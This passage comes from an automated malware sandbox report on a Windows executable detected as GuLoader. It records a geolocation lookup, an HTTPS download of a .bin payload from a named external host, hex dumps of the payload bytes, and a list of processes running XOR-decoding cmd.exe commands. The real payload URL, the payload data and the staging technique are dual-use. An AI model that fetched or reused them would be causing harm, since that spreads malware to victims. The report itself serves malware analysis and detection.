                                                                                                                                                                                  Data Ascii: { "geoplugin_request":"191.96.150.187", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  0192.168.11.2049735102.65.21.264434464C:\Users\user\Desktop\asXlZG3aW6.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-10-08 14:52:24 UTC177OUTGET /EsbmqCxkb162.bin HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                                                                  Host: telesavers.co.za
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2024-10-08 14:52:24 UTC249INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Tue, 08 Oct 2024 14:52:24 GMT
                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                                                  Connection: Upgrade, close
                                                                                                                                                                                  Last-Modified: Thu, 12 Sep 2024 07:12:43 GMT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Content-Length: 494656
                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                  2024-10-08 14:52:24 UTC7943INData Raw: 7d 93 95 bc bf a6 54 f0 0b c0 df 42 bb 41 06 30 33 3f 56 39 44 5c b4 c2 e6 56 59 5f f4 14 e5 ee eb 98 61 79 16 17 e4 2a a3 bd 1b ea f1 b0 35 27 e1 98 9f 35 bc 8f 11 71 5f d1 87 be 16 10 99 02 9c 77 9d 6a 2c ae 10 fd a3 a4 75 11 ed ef de 8b b2 bb 56 c9 0a a0 52 85 f6 31 03 5c 2d 41 57 c9 b2 88 60 c7 c1 0f 4d f7 44 d0 29 50 94 21 e3 1f f6 5a b3 7a f2 5a ea 96 0f 56 fa e9 88 69 30 60 af f2 b9 4c e0 3e 9a 93 e1 e0 20 e3 d8 57 fa 66 ef fa 13 0f 3a 37 d3 d1 96 91 1f dc 03 4c 89 8c 54 ce 35 e6 36 27 74 7f 9e b5 97 de 16 b9 c1 70 6e b8 4e dd d9 c1 2f cb 21 30 b7 35 df c2 15 b8 6b f6 91 8d 88 6d 40 27 21 fa 6c 72 e1 76 2e e9 b9 2c cd b8 72 83 a3 19 f9 34 e1 f7 37 0f b3 62 76 1c d2 82 7c 5f 56 f8 13 19 5f e4 c3 c5 a5 c9 02 96 4e 06 a2 98 3e 93 76 f0 92 8e 54 5f e6
                                                                                                                                                                                  Data Ascii: }TBA03?V9D\VY_ay*5'5q_wj,uVR1\-AW`MD)P!ZzZVi0`L> Wf:7LT56'tpnN/!05km@'!lrv.,r47bv|_V_N>vT_
                                                                                                                                                                                  2024-10-08 14:52:24 UTC8000INData Raw: 56 e7 6d 91 94 f1 5f b0 1e 27 81 a2 47 11 a2 2b a3 5b 0f 4d e2 59 ca ca 78 f8 96 d3 7d 2e ad 9f 9f 16 31 69 7c 73 2f 2f 46 a4 b2 a2 a4 f6 fd 02 43 88 dc 83 de a6 42 f3 29 2f 6d 3d 44 0b df e3 46 bf d5 b3 88 60 4c 19 34 93 84 41 5b 5c 58 7f 13 68 d0 1e 36 4f 85 0d d1 ea 1f 4a b2 71 21 41 81 bb a6 92 3f c4 07 0c 89 93 5e c0 af 54 43 2e be d8 1e 0d 4a 18 be c3 0d 50 98 27 71 0b ae 14 20 6c 10 a3 8b ab 83 9b 13 00 41 35 13 11 44 a4 09 6d db cb 3f cf ba f7 cc ab 84 e9 b3 fa c9 20 29 2d 31 02 7d a2 e5 c8 fe d3 51 af a5 46 0e e9 3c 73 da ad 42 79 30 d6 66 fe af ed 0c c6 89 d8 9c 20 f0 4d df 0a fd 2a 45 80 3e c5 50 4d 9a 49 5c 3e 4b 2b a7 22 90 63 f7 e0 66 ce b8 c2 2a 72 5e 63 2b bd da 6d b8 3a e0 66 5f ae ab a9 66 8d 98 52 c8 1c 50 fd a8 1d 76 c8 27 4e b3 6d 61
                                                                                                                                                                                  Data Ascii: Vm_'G+[MYx}.1i|s//FCB)/m=DF`L4A[\Xh6OJq!A?^TC.JP'q lA5Dm? )-1}QF<sBy0f M*E>PMI\>K+"cf*r^c+m:f_fRPv'Nma
                                                                                                                                                                                  2024-10-08 14:52:24 UTC8000INData Raw: 10 f3 09 b9 1f 48 26 05 fc 64 fa 75 60 28 aa 6f f2 e1 61 ed de bf 69 21 db 63 89 bb a6 12 cc 33 f4 80 d9 5d 95 d0 fc 3f cb 04 a1 0e f4 54 d5 dc 53 9b 18 e5 f9 8c 5d f8 fe d1 1a 8a ea 0f b7 6c b8 7c 00 72 29 a8 38 b7 35 5c 2e 01 33 ab e5 31 ff 86 77 7e 6d bf 1f 45 e4 b5 07 f9 97 c6 6e da 4b 64 7d 9d 0e d0 4d 3b 62 fe 96 89 04 01 56 9e 04 75 03 80 6e 41 ad f2 65 09 33 6b 3c 18 44 47 27 ae 82 00 e9 45 4b b8 19 ea 2f 31 a0 f1 f6 27 7c 05 40 6d 2b 3e 1a 83 b8 89 cd d9 7d cf 54 2f 12 b4 de c0 1a cf 94 61 e3 88 f4 c1 79 75 73 69 f2 24 04 83 b6 a1 ad 6f 60 30 c1 85 0f e9 0c 6b f5 91 86 0c 2d fb 7f f8 89 52 29 b9 08 3b 72 98 25 82 5f dc 5e e5 93 02 4d 5c f6 dd ef 71 ba bd 96 2c a0 07 64 c4 78 91 d5 e1 cd ef 6f b9 3e a1 a9 f6 95 18 fd 67 e4 4c c5 5e 4e 08 af 8f e6
                                                                                                                                                                                  Data Ascii: H&du`(oai!c3]?TS]l|r)85\.31w~mEnKd}M;bVunAe3k<DG'EK/1'|@m+>}T/ayusi$o`0k-R);r%_^M\q,dxo>gL^N
                                                                                                                                                                                  2024-10-08 14:52:24 UTC8000INData Raw: e0 3e cc dc 62 90 23 25 ec ea 4d e6 71 4e d0 fa 4d 2f eb b0 c9 05 5a 8a 17 bb 2c c2 69 37 79 ad 11 0d 17 cf 0f 23 3a 99 c4 b7 b0 e9 82 e8 60 de 64 cc 01 ee b8 8a 5f 8d 31 e7 c3 88 f7 60 c8 2b 27 07 bc 61 15 53 91 4c 3b f1 be 96 9d c8 1b bd ad 62 20 86 a0 73 6e 4f 21 60 29 03 5e 31 a9 19 a2 c1 be 5c 0e c0 7c ce a7 b3 43 6e 2f 0c 27 07 c7 b7 b2 e0 36 dc 49 d4 9a 8c c3 95 13 49 9a ba 4e 4d a4 8c 70 a6 8e 14 0f bc 4d 90 c3 0b e9 09 90 46 3c 7d d3 68 af 4e eb c5 90 d3 db 95 3b 48 5a bb 19 a9 59 3c 0c 8f e6 36 5f 98 b1 c0 db 76 d4 e6 9d 3d ac 73 55 e7 84 43 db 2a ff 5d 9f f5 a8 df 61 2f de b1 3e f7 4d 44 91 81 f7 5f 87 87 ca 1f 53 b6 4a df f5 db 5c db 68 f8 03 15 24 40 bb d1 c2 55 0c 5f e4 fc 03 d3 ee 7b 96 2e 57 4d f7 d7 80 62 f8 a6 ae ed 5f d2 e2 6b 67 f9 f4
                                                                                                                                                                                  Data Ascii: >b#%MqNM/Z,i7y#:`d_1`+'aSL;b snO!`)^1\|Cn/'6IINMpMF<}hN;HZY<6_v=sUC*]a/>MD_SJ\h$@U_{.WMb_kg
                                                                                                                                                                                  2024-10-08 14:52:24 UTC8000INData Raw: 8e 4f 9f 3e c9 ff 89 43 1b 3e 46 84 26 3d 48 43 33 19 1f e1 b8 b1 38 f0 fc 28 d0 26 49 d3 21 0e 92 c3 8d 1b 99 72 67 0e d0 a0 18 96 a9 0e b4 25 62 b1 17 27 2e 44 64 f3 62 47 bc d9 6d f0 9e cc 87 ab 53 52 db 3e d0 59 58 b2 24 e3 50 3e be b3 ef 8f 6b 7b 04 26 96 0a 33 f4 ed 7c 9e 6d c9 df c7 18 7b e5 00 8f 8c e0 31 87 9f 75 96 2b d7 59 c6 e6 88 c9 d5 fc 6c c7 3c 6f 3d 5a 53 19 3e 07 d2 b9 f1 5c 56 f7 75 eb 1a 46 3e f5 96 ea 9b a0 90 13 d9 34 16 2b aa 3b 3a 0b d3 cb 68 e1 85 49 e8 6e 16 9b 8d cb e5 88 a5 52 8d 4e 80 44 54 f3 5c c0 79 b1 47 db 36 5b 19 7f 24 f6 12 bb 1a 57 95 21 e1 91 dd e2 49 23 1b 4a af c8 6e 62 34 c8 e8 06 5d 62 d7 7a 70 bf 7f 6b fb da cf 4d 5e 5d e1 2e 9c 9f b4 70 fc fa 72 13 72 d4 70 b2 ec 49 db 48 63 0c 34 f5 dc 44 45 bc 1c 7b 57 6f b3
                                                                                                                                                                                  Data Ascii: O>C>F&=HC38(&I!rg%b'.DdbGmSR>YX$P>k{&3|m{1u+Yl<o=ZS>\VuF>4+;:hInRNDT\yG6[$W!I#Jnb4]bzpkM^].prrpIHc4DE{Wo
                                                                                                                                                                                  2024-10-08 14:52:25 UTC8000INData Raw: 6a f2 26 60 fc 5c 62 c5 46 2e 98 8d 04 1a 50 e7 ff 4a 9f a1 65 df 61 f6 65 80 be ee c5 c9 bf b7 5e eb 84 28 ab 4d d8 3f 3e ed f5 e3 5c ef aa f8 03 1e ca cb 06 15 14 1a 85 90 87 6e 51 34 9c 6e e6 b3 36 67 af 34 97 02 d5 2f 63 6d 6d 36 82 ed f2 03 26 87 06 0b ed 68 b5 0d a3 c9 76 a7 59 7e a4 1e 94 b6 c0 e9 7e 15 63 a8 6a 18 e4 da b1 a5 a1 63 68 30 68 99 d7 5a 91 0a a4 13 c6 ea 38 8a a4 a1 33 4f 83 5a 56 ec e7 a2 e7 64 0c ce 3d 70 53 42 bc 76 01 47 6c eb ec 49 db ac 86 5c 76 9b 34 ba b8 3b 1e 0f 67 d7 ca 21 fd 8f d9 65 f3 44 aa 44 eb 45 98 8a 76 68 2e 89 dc c7 6d 04 e6 e7 e4 93 86 93 95 3d ce 8b b4 7a b4 8d 8e e0 35 2f d5 23 77 87 a1 19 d8 81 8b 7e c3 c1 26 e7 1b d8 94 6c 3f ea 05 39 af 10 a9 45 29 34 0a de e3 08 5b b8 e8 ba 6f 58 13 03 c6 02 8b 56 86 17 c5
                                                                                                                                                                                  Data Ascii: j&`\bF.PJeae^(M?>\nQ4n6g4/cmm6&hvY~~cjch0hZ83OZVd=pSBvGlI\v4;g!eDDEvh.m=z5/#w~&l?9E)4[oXV
                                                                                                                                                                                  2024-10-08 14:52:25 UTC8000INData Raw: d5 e0 fd f2 5c 6f 47 ee 3f 39 a4 93 4c 2a 69 b4 7e 50 62 9d 6a 5e 85 04 bb 4d a1 fd 43 30 68 99 91 77 b2 de e1 fb 27 5d b3 7e 79 69 97 e0 34 e2 1f 3d 1a 5d 6c 98 12 24 23 67 c1 54 43 ee 24 04 a4 a6 d1 61 e8 3b f4 ef 0b e3 51 84 28 2c 5b d3 57 c0 d6 1a ba 98 fc 66 28 93 aa 5a 8e 90 3c 63 5b 19 ee fd b9 1b ac 6d 26 e7 12 b5 86 93 46 58 93 22 d5 7a f2 12 08 1d 65 a2 1c 4a 87 3f ac 02 03 02 ee 5c ee d6 aa e0 69 6b e0 87 c2 ae e1 83 50 18 25 15 62 51 6e 41 97 38 86 1c 66 93 87 40 22 7f c7 ed 3a 2c be 21 d2 f6 57 fa 42 48 56 95 10 74 5d 5c f5 d4 e8 43 cc 2f bd fa ec 07 a0 ea df 4c e7 f9 e1 16 1a a1 09 b9 a5 ec a6 18 7c 44 ec 9f 4f 41 56 9c 39 bf b4 aa d6 a3 07 1b 90 ae 07 20 8a 8c 45 1e 3e bb 39 a7 52 db 06 97 c6 c5 ed a0 ef f3 f4 7e fa a1 ad 7e 1e 63 2c e0 e4
                                                                                                                                                                                  Data Ascii: \oG?9L*i~Pbj^MC0hw']~yi4=]l$#gTC$a;Q(,[Wf(Z<c[m&FX"zeJ?\ikP%bQnA8f@":,!WBHVt]\C/L|DOAV9 E>9R~~c,
                                                                                                                                                                                  2024-10-08 14:52:25 UTC8000INData Raw: 02 b2 3b 74 aa 7d 88 11 7b fe 7e 04 71 c7 16 b5 de 55 de 82 58 0c 86 19 c9 58 01 50 67 6d 21 3e 51 94 ab f2 79 fb c7 28 d3 d8 b1 19 8b 71 3f c1 26 3c d3 98 39 3e db 55 37 d6 d9 db f5 ea af 1b 2d 01 69 b1 d6 aa 47 77 da 82 68 fc 6f 02 b7 56 24 6c 3a 1e f5 e9 99 bf da ac ca f6 05 5d e2 5a 02 86 93 28 6f 94 77 9a 37 65 33 26 07 34 48 62 be a7 a8 ea a1 22 0d 18 f6 24 57 00 84 0c 3f 21 21 0b 06 bd c1 66 de 69 2a 13 01 a3 9d 11 5c 19 29 21 96 a7 b8 26 d8 36 2e ba 1b da d0 40 f9 47 ca 0f fd 1d 85 57 58 fa 52 fd d8 77 12 01 cd e2 98 8c 43 96 53 f0 ff d3 52 bb 89 9e 16 d6 d2 39 70 cc 1e 9b 4a ac a1 75 8b f5 bf 14 6f 66 23 16 15 e8 a2 18 b8 df 3f 91 9e f5 da 41 82 23 7f ea f8 46 01 e4 5f c2 5a ea af 9a 75 5f 37 c0 54 23 3b 8a 41 5e 77 3a 75 52 35 be 3a 57 10 2a b9
                                                                                                                                                                                  Data Ascii: ;t}{~qUXXPgm!>Qy(q?&<9>U7-iGwhoV$l:]Z(ow7e3&4Hb"$W?!!fi*\)!&6.@GWXRwCSR9pJuof#?A#F_Zu_7T#;A^w:uR5:W*
                                                                                                                                                                                  2024-10-08 14:52:25 UTC8000INData Raw: 99 a3 30 33 43 70 1d 58 5f 7d 34 0f ef 55 1e 94 70 4d b1 45 23 c0 5c 0d d1 92 f8 68 60 7d c8 fd 54 6b 62 2c dc f1 82 35 ff ed 96 3a 7c b4 31 97 1d e4 6f f7 01 31 46 7c db 25 e5 50 e2 90 af ac 93 d2 c6 c5 e9 ac 6b a3 db 7a f3 6d e9 13 8a 75 82 60 0b ba 14 03 0f b1 c5 75 9f f0 47 ad 55 c7 d1 50 95 46 f7 d0 26 09 46 0c 05 45 52 e6 03 77 8f 19 4f f1 bf ad 0b ed f8 c1 15 68 4f 18 b8 93 7a 9d db 30 1e c6 42 a0 1a ce f8 ae 8a a8 b8 6a 5d c5 cd 8e 9d 50 13 ff 20 ef 1b 10 a6 5b 2e b1 d2 3b ba a2 f6 0a a2 d4 b9 55 6b 00 d0 66 98 6e bd 60 fc d1 a5 69 56 14 f3 fd a5 75 d8 d6 99 95 18 58 b3 c2 3d 0e bc c0 01 bd ea 44 00 95 de 2d e1 37 f4 17 9c 76 30 ab 68 51 1e 33 87 f4 b7 f8 53 a9 cd a0 57 45 69 ae d2 49 fc b9 5d 51 cd 24 f7 2d 8b 15 c7 04 93 13 92 40 39 aa f1 25 9e
                                                                                                                                                                                  Data Ascii: 03CpX_}4UpME#\h`}Tkb,5:|1o1F|%Pkzmu`uGUPF&FERwOhOz0Bj]P [.;Ukfn`iVuX=D-7v0hQ3SWEiI]Q$-@9%
                                                                                                                                                                                  2024-10-08 14:52:25 UTC8000INData Raw: ba 75 6c 60 8e bf 98 c5 5a a1 63 49 16 cf 06 34 77 88 50 29 ee db aa 50 56 27 d9 13 1a b6 bf 76 3a 71 53 16 03 9b 0f 6c 89 f0 88 43 15 4c 8a a2 4b e6 3e ee 76 c3 d9 19 63 85 f1 69 bb dd b6 f0 2b 60 33 8d 03 73 8c b6 b6 4b c7 89 ba 3e 3a 03 3b d5 46 86 b3 9d 10 82 c9 85 8c a3 b4 a3 61 c9 9a b3 85 47 7e dc dd bf 50 3c d8 f5 a4 d7 0d 2d dc 99 58 6a ae f1 36 84 f2 89 c5 67 1c b6 47 da a5 f3 8b 1d 3a 13 8f 78 73 a3 6b 57 bb bc 8c 70 e6 ee 97 ca c5 33 22 d5 5a af b3 19 9b 6f 2d f7 8c 17 6d 34 36 bc 1c f6 97 8c 4f a2 80 0a 6b 0a 24 68 43 d4 3f 90 df 0f 5f 20 24 59 69 f6 4c 94 97 29 f0 d5 bb cc dd 67 5d b5 ac f1 cb 31 90 7f 9d 6c b1 5c b3 27 51 3d b8 ed c4 84 26 45 0d 08 2f f9 42 7b cb 2f d7 68 b5 d0 77 a5 eb 02 b4 bb 1e 40 89 f5 7c 7c 8d be 93 02 6a 1d bc 1d ce
                                                                                                                                                                                  Data Ascii: ul`ZcI4wP)PV'v:qSlCLK>vci+`3sK>:;FaG~P<-Xj6gG:xskWp3"Zo-m46Ok$hC?_ $YiL)g]1l\'Q=&E/B{/hw@||j


                                                                                                                                                                                  Statistics

                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                  Behavior

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  System Behavior

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                  Start time:10:51:32
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Users\user\Desktop\asXlZG3aW6.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\asXlZG3aW6.exe"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:292'592 bytes
                                                                                                                                                                                  MD5 hash:51BFAB682069E4E7A2BA7B8379D3927B
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.21759600322.00000000004A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.21761784338.0000000004742000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                  Start time:10:51:32
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "250^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                  Start time:10:51:32
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                  Start time:10:51:32
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "244^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                  Start time:10:51:32
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                  Start time:10:51:32
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "227^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                  Start time:10:51:32
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                  Start time:10:51:32
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "255^177"
                                                                                                                                                                                  Imagebase:0x7ff77eef0000
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                  Start time:10:51:32
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "244^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "253^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "130^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "131^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
